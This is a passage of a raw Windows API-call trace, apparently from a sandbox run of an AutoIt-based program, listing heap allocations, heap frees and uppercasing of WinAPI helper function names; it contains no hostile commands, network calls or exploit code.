RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc568 [0073.212] CharUpperBuffW (in: lpsz="_WINAPI_COTASKMEMALLOC", cchLength=0x16 | out: lpsz="_WINAPI_COTASKMEMALLOC") returned 0x16 [0073.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc568 | out: hHeap=0x1780000) returned 1 [0073.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0108 | out: hHeap=0x1780000) returned 1 [0073.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d01c8 [0073.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc450 [0073.212] CharUpperBuffW (in: lpsz="_WINAPI_COTASKMEMFREE", cchLength=0x15 | out: lpsz="_WINAPI_COTASKMEMFREE") returned 0x15 [0073.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc450 | out: hHeap=0x1780000) returned 1 [0073.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d01c8 | out: hHeap=0x1780000) returned 1 [0073.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d01c8 [0073.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x17d6590 [0073.213] CharUpperBuffW (in: lpsz="_WINAPI_COTASKMEMREALLOC", cchLength=0x18 | out: lpsz="_WINAPI_COTASKMEMREALLOC") returned 0x18 [0073.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d6590 | out: hHeap=0x1780000) returned 1 [0073.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d01c8 | out: hHeap=0x1780000) returned 1 [0073.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0108 [0073.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc338 [0073.213] CharUpperBuffW (in: lpsz="_WINAPI_COUNINITIALIZE", cchLength=0x16 | out: lpsz="_WINAPI_COUNINITIALIZE") returned 0x16 [0073.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc338 | out: hHeap=0x1780000) returned 1 [0073.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0108 | out: hHeap=0x1780000) returned 1 [0073.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0108 [0073.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc370 [0073.213] CharUpperBuffW (in: lpsz="_WINAPI_CREATEGUID", cchLength=0x12 | out: lpsz="_WINAPI_CREATEGUID") returned 0x12 [0073.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc370 | out: hHeap=0x1780000) returned 1 [0073.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0108 | out: hHeap=0x1780000) returned 1 [0073.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0108 [0073.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x17d5e88 [0073.213] CharUpperBuffW (in: lpsz="_WINAPI_CREATESTREAMONHGLOBAL", cchLength=0x1d | out: lpsz="_WINAPI_CREATESTREAMONHGLOBAL") returned 0x1d [0073.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d5e88 | out: hHeap=0x1780000) returned 1 [0073.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0108 | out: hHeap=0x1780000) returned 1 [0073.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d01c8 [0073.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x17d6398 [0073.213] CharUpperBuffW (in: lpsz="_WINAPI_GETHGLOBALFROMSTREAM", cchLength=0x1c | out: lpsz="_WINAPI_GETHGLOBALFROMSTREAM") returned 0x1c [0073.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d6398 | out: hHeap=0x1780000) returned 1 [0073.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d01c8 | out: hHeap=0x1780000) returned 1 [0073.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17cfff8 [0073.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc1b0 [0073.213] CharUpperBuffW (in: lpsz="_WINAPI_PROGIDFROMCLSID", cchLength=0x17 | out: lpsz="_WINAPI_PROGIDFROMCLSID") returned 0x17 [0073.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc1b0 | out: hHeap=0x1780000) returned 1 [0073.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17cfff8 | out: hHeap=0x1780000) returned 1 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d01c8 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc300 [0073.214] CharUpperBuffW (in: lpsz="_WINAPI_RELEASESTREAM", cchLength=0x15 | out: lpsz="_WINAPI_RELEASESTREAM") returned 0x15 [0073.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc300 | out: hHeap=0x1780000) returned 1 [0073.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d01c8 | out: hHeap=0x1780000) returned 1 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4d40 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b9c0 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d01c8 [0073.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b9c0 | out: hHeap=0x1780000) returned 1 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4f20 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bbb8 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb88 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d0108 [0073.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb88 | out: hHeap=0x1780000) returned 1 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb88 [0073.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0108 | out: hHeap=0x1780000) returned 1 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4d18 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bab0 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0108 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435baf8 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b8e8 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d0128 [0073.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b8e8 | out: hHeap=0x1780000) returned 1 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b978 [0073.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0128 | out: hHeap=0x1780000) returned 1 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4e58 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435ba68 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17cffd8 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435ba98 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b9c0 [0073.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17cffe8 [0073.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b9c0 | out: hHeap=0x1780000) returned 1 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b9d8 [0073.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17cffe8 | out: hHeap=0x1780000) returned 1 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4e80 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bae0 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0128 [0073.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bae0 | out: hHeap=0x1780000) returned 1 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4ed0 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b9f0 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435ba20 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17cffe8 [0073.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ba20 | out: hHeap=0x1780000) returned 1 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bae0 [0073.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17cffe8 | out: hHeap=0x1780000) returned 1 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4cc8 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435ba08 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17cffe8 [0073.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ba08 | out: hHeap=0x1780000) returned 1 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f5088 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb58 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b918 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17cfff8 [0073.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b918 | out: hHeap=0x1780000) returned 1 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb10 [0073.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17cfff8 | out: hHeap=0x1780000) returned 1 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4d68 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb40 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17cfff8 [0073.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb40 | out: hHeap=0x1780000) returned 1 [0073.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4f48 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bbd0 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb28 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d0388 [0073.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb28 | out: hHeap=0x1780000) returned 1 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435ba08 [0073.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0388 | out: hHeap=0x1780000) returned 1 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4f70 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b960 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0368 [0073.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b960 | out: hHeap=0x1780000) returned 1 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x17d62c0 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435ba20 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b948 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d0268 [0073.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b948 | out: hHeap=0x1780000) returned 1 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b8e8 [0073.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0268 | out: hHeap=0x1780000) returned 1 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f50d8 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b948 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d02a8 [0073.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b948 | out: hHeap=0x1780000) returned 1 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f50b0 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb28 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb40 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d01e8 [0073.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb40 | out: hHeap=0x1780000) returned 1 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b918 [0073.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d01e8 | out: hHeap=0x1780000) returned 1 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4f98 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b930 [0073.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0388 [0073.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b930 | out: hHeap=0x1780000) returned 1 [0073.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc1e8 [0073.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b9c0 [0073.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b960 [0073.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d03b8 [0073.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b960 | out: hHeap=0x1780000) returned 1 [0073.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b930 [0073.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d0398 [0073.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0073.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb40 [0073.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d01d8 [0073.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf0) returned 0x4314ff8 [0073.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb40 | out: hHeap=0x1780000) returned 1 [0073.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0073.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0398 | out: hHeap=0x1780000) returned 1 [0073.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d03b8 | out: hHeap=0x1780000) returned 1 [0073.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4c28 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b948 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d02b8 [0073.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b948 | out: hHeap=0x1780000) returned 1 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc4f8 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435ba38 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb40 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d01e8 [0073.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb40 | out: hHeap=0x1780000) returned 1 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b948 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d0398 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb40 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0358 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da128 [0073.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb40 | out: hHeap=0x1780000) returned 1 [0073.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0073.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0398 | out: hHeap=0x1780000) returned 1 [0073.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d01e8 | out: hHeap=0x1780000) returned 1 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4ca0 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb40 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d02f8 [0073.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb40 | out: hHeap=0x1780000) returned 1 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4c50 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435ba50 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b960 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d0278 [0073.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b960 | out: hHeap=0x1780000) returned 1 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb40 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d0298 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f88 [0073.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b960 [0073.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0308 [0073.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf0) returned 0x43155c8 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b960 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f88 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0298 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0278 | out: hHeap=0x1780000) returned 1 [0073.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4cf0 [0073.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b960 [0073.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0398 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b960 | out: hHeap=0x1780000) returned 1 [0073.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f5218 [0073.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b960 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bc00 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bd20 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5a98 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bcd8 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17970e8 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d01e8 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0318 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bea0 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bd80 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bdf8 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17fb698 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bde0 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0318 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d03a8 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bd38 | out: hHeap=0x1780000) returned 1 [0073.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bd08 | out: hHeap=0x1780000) returned 1 [0073.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435be70 | out: hHeap=0x1780000) returned 1 [0073.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050de0 | out: hHeap=0x1780000) returned 1 [0073.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bd80 | out: hHeap=0x1780000) returned 1 [0073.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_10", cchCount1=6, lpString2="WIN_XP", cchCount2=6) returned 1 [0073.221] CharUpperBuffW (in: lpsz="_WINAPI_CHARTOOEM", cchLength=0x11 | out: lpsz="_WINAPI_CHARTOOEM") returned 0x11 [0073.221] CharUpperBuffW (in: lpsz="_WINAPI_CLIENTTOSCREEN", cchLength=0x16 | out: lpsz="_WINAPI_CLIENTTOSCREEN") returned 0x16 [0073.221] CharUpperBuffW (in: lpsz="_WINAPI_DWORDTOFLOAT", cchLength=0x14 | out: lpsz="_WINAPI_DWORDTOFLOAT") returned 0x14 [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_DWORDTOINT", cchLength=0x12 | out: lpsz="_WINAPI_DWORDTOINT") returned 0x12 [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_FLOATTODWORD", cchLength=0x14 | out: lpsz="_WINAPI_FLOATTODWORD") returned 0x14 [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_FLOATTOINT", cchLength=0x12 | out: lpsz="_WINAPI_FLOATTOINT") returned 0x12 [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_GETXYFROMPOINT", cchLength=0x16 | out: lpsz="_WINAPI_GETXYFROMPOINT") returned 0x16 [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_GUIDFROMSTRING", cchLength=0x16 | out: lpsz="_WINAPI_GUIDFROMSTRING") returned 0x16 [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_GUIDFROMSTRINGEX", cchLength=0x18 | out: lpsz="_WINAPI_GUIDFROMSTRINGEX") returned 0x18 [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_HASHDATA", cchLength=0x10 | out: lpsz="_WINAPI_HASHDATA") returned 0x10 [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_HASHSTRING", cchLength=0x12 | out: lpsz="_WINAPI_HASHSTRING") returned 0x12 [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_HIBYTE", cchLength=0xe | out: lpsz="_WINAPI_HIBYTE") returned 0xe [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_HIDWORD", cchLength=0xf | out: lpsz="_WINAPI_HIDWORD") returned 0xf [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_HIWORD", cchLength=0xe | out: lpsz="_WINAPI_HIWORD") returned 0xe [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_INTTODWORD", cchLength=0x12 | out: lpsz="_WINAPI_INTTODWORD") returned 0x12 [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_INTTOFLOAT", cchLength=0x12 | out: lpsz="_WINAPI_INTTOFLOAT") returned 0x12 [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_LOBYTE", cchLength=0xe | out: lpsz="_WINAPI_LOBYTE") returned 0xe [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_LODWORD", cchLength=0xf | out: lpsz="_WINAPI_LODWORD") returned 0xf [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_LOWORD", cchLength=0xe | out: lpsz="_WINAPI_LOWORD") returned 0xe [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_LONGMID", cchLength=0xf | out: lpsz="_WINAPI_LONGMID") returned 0xf [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_MAKELANGID", cchLength=0x12 | out: lpsz="_WINAPI_MAKELANGID") returned 0x12 [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_MAKELCID", cchLength=0x10 | out: lpsz="_WINAPI_MAKELCID") returned 0x10 [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_MAKELONG", cchLength=0x10 | out: lpsz="_WINAPI_MAKELONG") returned 0x10 [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_MAKEQWORD", cchLength=0x11 | out: lpsz="_WINAPI_MAKEQWORD") returned 0x11 [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_MAKEWORD", cchLength=0x10 | out: lpsz="_WINAPI_MAKEWORD") returned 0x10 [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_MULTIBYTETOWIDECHAR", cchLength=0x1b | out: lpsz="_WINAPI_MULTIBYTETOWIDECHAR") returned 0x1b [0073.222] CharUpperBuffW (in: lpsz="_WINAPI_MULTIBYTETOWIDECHAREX", cchLength=0x1d | out: 